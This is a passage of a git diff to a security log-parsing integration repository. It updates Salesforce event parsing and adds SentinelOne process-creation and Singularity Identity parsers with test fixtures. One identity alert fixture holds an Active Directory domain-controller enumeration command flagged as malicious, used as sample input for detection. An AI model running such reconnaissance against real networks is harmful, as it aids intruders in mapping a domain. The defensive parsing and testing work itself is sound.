ec92923ea..29be61136 100644 --- a/Salesforce/salesforce-events/_meta/fields.yml +++ b/Salesforce/salesforce-events/_meta/fields.yml @@ -117,3 +117,8 @@ salesforce.user.type: description: Salesforce user type name: salesforce.user.type type: keyword + +salesforce.user_agent: + description: Salesforce user agent + name: salesforce.user_agent + type: number diff --git a/Salesforce/salesforce-events/ingest/parser.yml b/Salesforce/salesforce-events/ingest/parser.yml index 7a3452fa9..54db25d6c 100644 --- a/Salesforce/salesforce-events/ingest/parser.yml +++ b/Salesforce/salesforce-events/ingest/parser.yml @@ -72,7 +72,7 @@ stages: filter: "{{json_event.output.BROWSER_TYPE != None}}" - set: - user_agent.original: "{{json_event.output.USER_AGENT}}" + salesforce.user_agent: "{{json_event.output.USER_AGENT | int}}" filter: "{{json_event.output.USER_AGENT != None}}" set_source_ip: @@ -147,6 +147,14 @@ stages: user.name: "{{json_event.output.USERNAME}}" filter: "{{json_event.output.USERNAME != None}}" + - set: + user.name: "{{json_event.output.USER_NAME}}" + filter: "{{json_event.output.USER_NAME != None and '@' not in json_event.output.USER_NAME}}" + + - set: + user.email: "{{json_event.output.USER_NAME}}" + filter: "{{json_event.output.USER_NAME != None and '@' in json_event.output.USER_NAME}}" + - set: user.email: "{{json_event.output.USER}}" filter: "{{json_event.output.USER != None}}" @@ -201,6 +209,7 @@ stages: tls.cipher: "{{json_event.output.CIPHER_SUITE}}" tls.version: "{{json_event.output.TLS_PROTOCOL}}" + url.original: "{{json_event.output.LOGIN_URL}}" host.id: "{{json_event.output.DEVICE_ID}}" host.os.name: "{{json_event.output.OS_NAME}}" host.os.version: "{{json_event.output.OS_VERSION}}" diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json new file mode 100644 index 000000000..2250f3670 --- /dev/null +++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json @@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"12024001\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" + }, + "expected": { + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"12024001\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", + "event": { + "category": [ + "network" + ], + "dataset": "ApexRestApi", + "type": [ + "info" + ] + }, + "@timestamp": "2034-02-21T02:48:31.272150Z", + "http": { + "request": { + "method": "POST" + }, + "response": { + "mime_type": "application/json", + "status_code": 200 + } + }, + "organization": { + "id": "11111111111111111" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "salesforce": { + "login": { + "key": "xxxxxxxxxxxxxx" + }, + "request": { + "id": "5-Acr8biM2uu2UsrkBY5B-", + "status": "S" + }, + "session": { + "key": { + "id": "session-key12323" + } + }, + "user": { + "type": "Standard" + }, + "user_agent": 12024001 + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "path": "/requests" + }, + "user": { + "id": "user123123123123" + } + } +} \ No newline at end of file diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event.json b/Salesforce/salesforce-events/tests/salesforce_complete_event.json index 03b6811ee..ceeb7b881 100644 --- a/Salesforce/salesforce-events/tests/salesforce_complete_event.json +++ b/Salesforce/salesforce-events/tests/salesforce_complete_event.json @@ -45,6 +45,9 @@ "related": { "ip": [ "1.2.3.4" + ], + "user": [ + "test_user" ] }, "salesforce": { @@ -119,7 +122,8 @@ "query": "queryParam1=val1&queryParam2=val2" }, "user": { - "id": "00530000009M943" + "id": "00530000009M943", + "name": "test_user" }, "user_agent": { "device": { diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json index bc1c801cf..89c90352a 100644 --- a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json +++ b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json @@ -45,6 +45,9 @@ "related": { "ip": [ "1.2.3.4" + ], + "user": [ + "test_user" ] }, "salesforce": { @@ -100,7 +103,8 @@ "user": { "initiated_logout": true, "type": "admin" - } + }, + "user_agent": 0 }, "source": { "address": "1.2.3.4", @@ -114,19 +118,12 @@ "path": "/sObject/0064100000JXITSAA5/view" }, "user": { - "id": "00530000009M943" + "id": "00530000009M943", + "name": "test_user" }, "user_agent": { - "device": { - "name": "Other" - }, "name": "Chrome", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", - "os": { - "name": "Windows", - "version": "10" - }, - "version": "93.0.4577" + "version": "93.0.4577.82" } } } \ No newline at end of file diff --git a/Salesforce/salesforce-events/tests/salesforce_login_event.json b/Salesforce/salesforce-events/tests/salesforce_login_event.json index e87c6f5a9..7719dc746 100644 --- a/Salesforce/salesforce-events/tests/salesforce_login_event.json +++ b/Salesforce/salesforce-events/tests/salesforce_login_event.json @@ -28,6 +28,15 @@ "address": "192.168.0.1", "ip": "192.168.0.1" }, + "url": { + "domain": "login.salesforce.com", + "original": "https://login.salesforce.com", + "port": 443, + "registered_domain": "salesforce.com", + "scheme": "https", + "subdomain": "login", + "top_level_domain": "com" + }, "user": { "email": "john.doe@example.com" } diff --git a/Salesforce/salesforce-events/tests/salesforce_login_event_1.json b/Salesforce/salesforce-events/tests/salesforce_login_event_1.json new file mode 100644 index 000000000..ed22aefee --- /dev/null +++ b/Salesforce/salesforce-events/tests/salesforce_login_event_1.json @@ -0,0 +1,69 @@ +{ + "input": { + "message": "{\"EVENT_TYPE\":\"Login\",\"TIMESTAMP\":\"20241026044641.024\",\"REQUEST_ID\":\"request_id_test\",\"ORGANIZATION_ID\":\"ORG_ID_TEST\",\"USER_ID\":\"USER_ID_TEST\",\"RUN_TIME\":\"47\",\"CPU_TIME\":\"12\",\"URI\":\"/services/oauth2/token\",\"SESSION_KEY\":\"\",\"LOGIN_KEY\":\"xxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"\",\"DB_TOTAL_TIME\":\"29963703\",\"LOGIN_TYPE\":\"i\",\"BROWSER_TYPE\":\"python-requests/2.28.0\",\"API_TYPE\":\"\",\"API_VERSION\":\"9998.0\",\"USER_NAME\":\"user.integration@test.com\",\"TLS_PROTOCOL\":\"TLSv1.3\",\"CIPHER_SUITE\":\"TLS_AES_256_GCM_SHA384\",\"LOGIN_URL\":\"test.my.salesforce.com\",\"AUTHENTICATION_METHOD_REFERENCE\":\"\",\"LOGIN_SUB_TYPE\":\"oauthclientcredentials\",\"AUTHENTICATION_SERVICE_ID\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-26T04:46:41.024Z\",\"USER_ID_DERIVED\":\"USER_ID_TEST_IA4\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\",\"LOGIN_STATUS\":\"LOGIN_NO_ERROR\",\"SOURCE_IP\":\"1.2.3.4\",\"FORWARDED_FOR_IP\":\"\"}" + }, + "expected": { + "message": "{\"EVENT_TYPE\":\"Login\",\"TIMESTAMP\":\"20241026044641.024\",\"REQUEST_ID\":\"request_id_test\",\"ORGANIZATION_ID\":\"ORG_ID_TEST\",\"USER_ID\":\"USER_ID_TEST\",\"RUN_TIME\":\"47\",\"CPU_TIME\":\"12\",\"URI\":\"/services/oauth2/token\",\"SESSION_KEY\":\"\",\"LOGIN_KEY\":\"xxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"\",\"DB_TOTAL_TIME\":\"29963703\",\"LOGIN_TYPE\":\"i\",\"BROWSER_TYPE\":\"python-requests/2.28.0\",\"API_TYPE\":\"\",\"API_VERSION\":\"9998.0\",\"USER_NAME\":\"user.integration@test.com\",\"TLS_PROTOCOL\":\"TLSv1.3\",\"CIPHER_SUITE\":\"TLS_AES_256_GCM_SHA384\",\"LOGIN_URL\":\"test.my.salesforce.com\",\"AUTHENTICATION_METHOD_REFERENCE\":\"\",\"LOGIN_SUB_TYPE\":\"oauthclientcredentials\",\"AUTHENTICATION_SERVICE_ID\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-26T04:46:41.024Z\",\"USER_ID_DERIVED\":\"USER_ID_TEST_IA4\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\",\"LOGIN_STATUS\":\"LOGIN_NO_ERROR\",\"SOURCE_IP\":\"1.2.3.4\",\"FORWARDED_FOR_IP\":\"\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "Login", + "type": [ + "start" + ] + }, + "@timestamp": "2034-02-21T02:43:24.464103Z", + "organization": { + "id": "ORG_ID_TEST" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "salesforce": { + "api": { + "version": "9998.0" + }, + "login": { + "key": "xxxxxxxxxxxxx", + "status": "LOGIN_NO_ERROR", + "sub_type": "oauthclientcredentials" + }, + "request": { + "id": "request_id_test" + }, + "user": { + "type": "Standard" + } + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "tls": { + "cipher": "TLS_AES_256_GCM_SHA384", + "version": "TLSv1.3" + }, + "url": { + "original": "test.my.salesforce.com", + "path": "/services/oauth2/token" + }, + "user": { + "email": "user.integration@test.com", + "id": "USER_ID_TEST" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Python Requests", + "original": "python-requests/2.28.0", + "os": { + "name": "Other" + }, + "version": "2.28" + } + } +} \ No newline at end of file diff --git a/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json b/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json index 9a4b1bf43..9acf6e91d 100644 --- a/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json +++ b/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json @@ -682,6 +682,58 @@ } ] }, + { + "value": "Process {process.command_line} was created by {process.user.name}", + "conditions": [ + { + "field": "event.action", + "value": "Process Creation" + }, + { + "field": "process.user.name" + }, + { + "field": "process.command_line" + } + ], + "relationships": [ + { + "source": "process.user.name", + "target": "process.parent.command_line", + "type": "created" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.title", + "type": "has process title" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "has name" + }, + { + "source": "process.command_line", + "target": "process.title", + "type": "has title" + }, + { + "source": "process.command_line", + "target": "process.name", + "type": "has name" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "created" + }, + { + "source": "process.user.name", + "target": "host.name", + "type": "logged on" + } + ] + }, { "value": "Process {process.command_line} was created by {user.name}", "conditions": [ diff --git a/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json b/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json new file mode 100644 index 000000000..62320459c --- /dev/null +++ b/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json @@ -0,0 +1,96 @@ +{ + "input": { + "message": "{\"tgt.process.displayName\":\"curl\",\"event.category\":\"process\",\"site.id\":\"1967302198659758782\",\"tgt.process.pid\":30273,\"endpoint.os\":\"osx\",\"tgt.process.name\":\"curl\",\"tgt.process.storyline.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.signedStatus\":\"signed\",\"tgt.process.isNative64Bit\":false,\"mgmt.id\":\"16205\",\"os.name\":\"OS X\",\"tgt.process.cmdline\":\"curl -H User-Agent: test.nvim v1.10.0 (+https:\\/\\/test.test\\/tttttttt\\/test.nvim) -fsSL -X GET -o \\/Users\\/test.user\\/.local\\/share\\/nvim\\/test\\/registries\\/github\\/test-org\\/test-registry\\/registry.json.zip --connect-timeout 30 https:\\/\\/test.test\\/test-org\\/test-registry\\/releases\\/download\\/2024-12-05-doting-coil\\/registry.json.zip\",\"i.version\":\"preprocess-lib-1.0\",\"process.unique.key\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.uid\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.isStorylineRoot\":false,\"mgmt.url\":\"mgm-testing-test.sentinelone.net\",\"agent.version\":\"23.3.1.7037\",\"tgt.process.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"tgt.process.image.sha256\":\"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42\",\"mgmt.osRevision\":\"14.7.1 (23H222)\",\"meta.event.name\":\"PROCESSCREATION\",\"group.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.publisher\":\"\",\"tgt.process.startTime\":1733386731479,\"tgt.process.verifiedStatus\":\"verified\",\"endpoint.type\":\"laptop\",\"tgt.process.image.path\":\"\\/usr\\/bin\\/curl\",\"i.scheme\":\"edr\",\"trace.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX\",\"tgt.process.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"site.name\":\"LEDGER\",\"agent.uuid\":\"xxxx-XXXXXX-XXXXx-xxxxx\",\"tgt.process.image.md5\":\"fe61928bbd84ed16fc4f934307bf2f16\",\"event.time\":1733386731479,\"tgt.process.user\":\"test.user\",\"timestamp\":\"2024-12-05T08:18:51.479Z\",\"account.id\":\"1967302197074311859\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"LMFR0205\",\"packet.id\":\"949E7E9F-F1E6-4507-830F-E272AAED8F15\",\"tgt.process.sessionId\":0,\"dataSource.vendor\":\"SentinelOne\",\"dataSource.category\":\"security\",\"tgt.process.isRedirectCmdProcessor\":false,\"tgt.process.image.sha1\":\"e817c506298dc8a2dba727562b6efc60dcf4db1a\",\"account.name\":\"24 - LEDGER\",\"event.type\":\"Process Creation\",\"event.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX_77\"}" + }, + "expected": { + "message": "{\"tgt.process.displayName\":\"curl\",\"event.category\":\"process\",\"site.id\":\"1967302198659758782\",\"tgt.process.pid\":30273,\"endpoint.os\":\"osx\",\"tgt.process.name\":\"curl\",\"tgt.process.storyline.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.signedStatus\":\"signed\",\"tgt.process.isNative64Bit\":false,\"mgmt.id\":\"16205\",\"os.name\":\"OS X\",\"tgt.process.cmdline\":\"curl -H User-Agent: test.nvim v1.10.0 (+https:\\/\\/test.test\\/tttttttt\\/test.nvim) -fsSL -X GET -o \\/Users\\/test.user\\/.local\\/share\\/nvim\\/test\\/registries\\/github\\/test-org\\/test-registry\\/registry.json.zip --connect-timeout 30 https:\\/\\/test.test\\/test-org\\/test-registry\\/releases\\/download\\/2024-12-05-doting-coil\\/registry.json.zip\",\"i.version\":\"preprocess-lib-1.0\",\"process.unique.key\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.uid\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.isStorylineRoot\":false,\"mgmt.url\":\"mgm-testing-test.sentinelone.net\",\"agent.version\":\"23.3.1.7037\",\"tgt.process.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"tgt.process.image.sha256\":\"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42\",\"mgmt.osRevision\":\"14.7.1 (23H222)\",\"meta.event.name\":\"PROCESSCREATION\",\"group.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.publisher\":\"\",\"tgt.process.startTime\":1733386731479,\"tgt.process.verifiedStatus\":\"verified\",\"endpoint.type\":\"laptop\",\"tgt.process.image.path\":\"\\/usr\\/bin\\/curl\",\"i.scheme\":\"edr\",\"trace.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX\",\"tgt.process.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"site.name\":\"LEDGER\",\"agent.uuid\":\"xxxx-XXXXXX-XXXXx-xxxxx\",\"tgt.process.image.md5\":\"fe61928bbd84ed16fc4f934307bf2f16\",\"event.time\":1733386731479,\"tgt.process.user\":\"test.user\",\"timestamp\":\"2024-12-05T08:18:51.479Z\",\"account.id\":\"1967302197074311859\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"LMFR0205\",\"packet.id\":\"949E7E9F-F1E6-4507-830F-E272AAED8F15\",\"tgt.process.sessionId\":0,\"dataSource.vendor\":\"SentinelOne\",\"dataSource.category\":\"security\",\"tgt.process.isRedirectCmdProcessor\":false,\"tgt.process.image.sha1\":\"e817c506298dc8a2dba727562b6efc60dcf4db1a\",\"account.name\":\"24 - LEDGER\",\"event.type\":\"Process Creation\",\"event.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX_77\"}", + "event": { + "action": "Process Creation", + "category": [ + "process" + ], + "dataset": "cloud-funnel-2.0", + "type": [ + "info" + ] + }, + "@timestamp": "2024-12-05T08:18:51.479000Z", + "agent": { + "version": "23.3.1.7037" + }, + "deepvisibility": { + "agent": { + "managment_url": "mgm-testing-test.sentinelone.net", + "trace_id": "XXXXXXX-XXXXXXXX-XXXXXXX", + "uuid": "xxxx-XXXXXX-XXXXx-xxxxx" + }, + "event": { + "category": "process", + "type": "Process Creation" + }, + "host": { + "os": { + "revision": "14.7.1 (23H222)" + } + }, + "process": { + "target": { + "command_line": "curl -H User-Agent: test.nvim v1.10.0 (+https://test.test/tttttttt/test.nvim) -fsSL -X GET -o /Users/test.user/.local/share/nvim/test/registries/github/test-org/test-registry/registry.json.zip --connect-timeout 30 https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "executable": "/usr/bin/curl", + "hash": { + "md5": "fe61928bbd84ed16fc4f934307bf2f16", + "sha1": "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "sha256": "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42" + }, + "name": "curl", + "storyline_id": "EE9FB66D-9B03-4286-971C-7A20615D157B", + "title": "curl", + "working_directory": "/usr/bin" + } + } + }, + "host": { + "name": "LMFR0205", + "os": { + "family": "osx", + "name": "OS X" + }, + "type": "laptop" + }, + "observer": { + "vendor": "SentinelOne" + }, + "process": { + "command_line": "curl -H User-Agent: test.nvim v1.10.0 (+https://test.test/tttttttt/test.nvim) -fsSL -X GET -o /Users/test.user/.local/share/nvim/test/registries/github/test-org/test-registry/registry.json.zip --connect-timeout 30 https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "executable": "/usr/bin/curl", + "hash": { + "md5": "fe61928bbd84ed16fc4f934307bf2f16", + "sha1": "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "sha256": "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42" + }, + "name": "curl", + "pid": 30273, + "start": "2024-12-05T08:18:51.479000Z", + "title": "curl", + "user": { + "name": "test.user" + }, + "working_directory": "/usr/bin" + }, + "related": { + "hash": [ + "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42", + "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "fe61928bbd84ed16fc4f934307bf2f16" + ] + }, + "url": { + "domain": "test.test", + "original": "https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "path": "/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "port": 443, + "scheme": "https", + "subdomain": "test" + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/CHANGELOG.md b/SentinelOne/identity/CHANGELOG.md new file mode 100644 index 000000000..11bddf32c --- /dev/null +++ b/SentinelOne/identity/CHANGELOG.md @@ -0,0 +1,8 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] diff --git a/SentinelOne/identity/_meta/fields.yml b/SentinelOne/identity/_meta/fields.yml new file mode 100644 index 000000000..36e8acf65 --- /dev/null +++ b/SentinelOne/identity/_meta/fields.yml @@ -0,0 +1,39 @@ +sentinelone.identity.attackSurfaces: + description: '' + name: sentinelone.identity.attackSurfaces + type: keyword + +sentinelone.identity.classification: + description: '' + name: sentinelone.identity.classification + type: keyword + +sentinelone.identity.confidenceLevel: + description: '' + name: sentinelone.identity.confidenceLevel + type: keyword + +sentinelone.identity.id: + description: '' + name: sentinelone.identity.id + type: keyword + +sentinelone.identity.name: + description: '' + name: sentinelone.identity.name + type: keyword + +sentinelone.identity.result: + description: '' + name: sentinelone.identity.result + type: keyword + +sentinelone.identity.status: + description: '' + name: sentinelone.identity.status + type: keyword + +sentinelone.identity.storyLineId: + description: '' + name: sentinelone.identity.storyLineId + type: keyword diff --git a/SentinelOne/identity/_meta/logo.png b/SentinelOne/identity/_meta/logo.png new file mode 100644 index 000000000..817c84f53 Binary files /dev/null and b/SentinelOne/identity/_meta/logo.png differ diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml new file mode 100644 index 000000000..e8b52a2d5 --- /dev/null +++ b/SentinelOne/identity/_meta/manifest.yml @@ -0,0 +1,11 @@ +uuid: b502e522-6996-4b12-9538-f69326b68243 +name: SentinelOne Singularity Identity [ALPHA] +slug: sentinelone-singularity-identity +automation_connector_uuid: 2d772558-821d-4663-87bd-af28bbb8415a +automation_module_uuid: ff675e74-e5c1-47c8-a571-d207fc297464 + +description: >- + SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats. + +data_sources: + Application logs: activites performed on SentinelOne infrastructure are logged diff --git a/SentinelOne/identity/_meta/smart-descriptions.json b/SentinelOne/identity/_meta/smart-descriptions.json new file mode 100644 index 000000000..e09c5db80 --- /dev/null +++ b/SentinelOne/identity/_meta/smart-descriptions.json @@ -0,0 +1,46 @@ +[ + { + "value": "Alert defined {sentinelone.identity.name} with status {sentinelone.identity.status} on {process.command_line}", + "conditions": [ + { + "field": "sentinelone.identity.name" + }, + { + "field": "sentinelone.identity.status" + }, + { + "field": "process.command_line" + } + ] + }, + { + "value": "Alert defined {sentinelone.identity.name} with status {sentinelone.identity.status}", + "conditions": [ + { + "field": "sentinelone.identity.name" + }, + { + "field": "sentinelone.identity.status" + } + ] + }, + { + "value": "Alert defined {sentinelone.identity.name} on {process.command_line}", + "conditions": [ + { + "field": "sentinelone.identity.name" + }, + { + "field": "process.command_line" + } + ] + }, + { + "value": "Alert defined {sentinelone.identity.name}", + "conditions": [ + { + "field": "sentinelone.identity.name" + } + ] + } +] diff --git a/SentinelOne/identity/ingest/parser.yml b/SentinelOne/identity/ingest/parser.yml new file mode 100644 index 000000000..90577404d --- /dev/null +++ b/SentinelOne/identity/ingest/parser.yml @@ -0,0 +1,67 @@ +name: identity +pipeline: + - name: json_event + external: + name: json.parse-json + properties: + input_field: "{{original.message}}" + + - name: detected_at + filter: "{{json_event.message.detectedAt != null}}" + external: + name: date.parse + properties: + input_field: "{{json_event.message.detectedAt}}" + output_field: timestamp + + - name: started_at + filter: "{{json_event.message.firstSeenAt != null}}" + external: + name: date.parse + properties: + input_field: "{{json_event.message.firstSeenAt}}" + output_field: timestamp + + - name: last_seen_at + filter: "{{json_event.message.lastSeenAt != null}}" + external: + name: date.parse + properties: + input_field: "{{json_event.message.lastSeenAt}}" + output_field: timestamp + + - name: set_meta_fields +stages: + set_meta_fields: + actions: + - set: + event.kind: "alert" + event.category: "intrusion_detection" + event.type: "info" + observer.vendor: "SentinelOne" + observer.product: "Singularity Identity" + + "@timestamp": "{{detected_at.timestamp}}" + event.start: "{{started_at.timestamp}}" + event.end: "{{last_seen_at.timestamp}}" + + event.provider: "{{json_event.message.detectionSource.product}}" + event.reason: "{{json_event.message.description}}" + + process.command_line: "{{json_event.message.process.cmdLine}}" + process.parent.name: "{{json_event.message.process.parentName}}" + + process.executable: "{{json_event.message.process.file.path}}" + process.name: "{{json_event.message.process.file.path | basename}}" + process.hash.sha1: "{{json_event.message.process.file.sha1}}" + process.hash.sha256: "{{json_event.message.process.file.sha256}}" + process.hash.md5: "{{json_event.message.process.file.md5}}" + + sentinelone.identity.id: "{{json_event.message.id}}" + sentinelone.identity.name: "{{json_event.message.name}}" + sentinelone.identity.attackSurfaces: "{{json_event.message.attackSurfaces}}" + sentinelone.identity.status: "{{json_event.message.status}}" + sentinelone.identity.classification: "{{json_event.message.classification}}" + sentinelone.identity.confidenceLevel: "{{json_event.message.confidenceLevel}}" + sentinelone.identity.result: "{{json_event.message.result}}" + sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}" diff --git a/SentinelOne/identity/tests/test_alert_1.json b/SentinelOne/identity/tests/test_alert_1.json new file mode 100644 index 000000000..8d5dcf96a --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_1.json @@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\n \"id\": \"ba485919-e4c1-4496-9e2f-feb320f6841a\",\n \"name\": \"Domain Controller Discovery Detected\",\n \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\",\n \"detectedAt\": \"2024-11-22T05:35:09.000Z\",\n \"attackSurfaces\": [\n \"IDENTITY\"\n ],\n \"detectionSource\": {\n \"product\": \"Identity\"\n },\n \"status\": \"NEW\",\n \"assignee\": null,\n \"classification\": \"ENUMERATION\",\n \"confidenceLevel\": \"MALICIOUS\",\n \"firstSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"lastSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"process\": {\n \"cmdLine\": \"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Controllers\\\" /domain\",\n \"file\": {\n \"path\": \"c:\\\\windows\\\\system32\\\\net1.exe\",\n \"sha1\": null,\n \"sha256\": \"18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398\",\n \"md5\": null\n },\n \"parentName\": null\n },\n \"result\": null,\n \"storylineId\": null\n}" + }, + "expected": { + "message": "{\n \"id\": \"ba485919-e4c1-4496-9e2f-feb320f6841a\",\n \"name\": \"Domain Controller Discovery Detected\",\n \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\",\n \"detectedAt\": \"2024-11-22T05:35:09.000Z\",\n \"attackSurfaces\": [\n \"IDENTITY\"\n ],\n \"detectionSource\": {\n \"product\": \"Identity\"\n },\n \"status\": \"NEW\",\n \"assignee\": null,\n \"classification\": \"ENUMERATION\",\n \"confidenceLevel\": \"MALICIOUS\",\n \"firstSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"lastSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"process\": {\n \"cmdLine\": \"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Controllers\\\" /domain\",\n \"file\": {\n \"path\": \"c:\\\\windows\\\\system32\\\\net1.exe\",\n \"sha1\": null,\n \"sha256\": \"18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398\",\n \"md5\": null\n },\n \"parentName\": null\n },\n \"result\": null,\n \"storylineId\": null\n}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T05:35:09Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T05:35:09Z", + "type": "info" + }, + "@timestamp": "2024-11-22T05:35:09Z", + "observer": { + 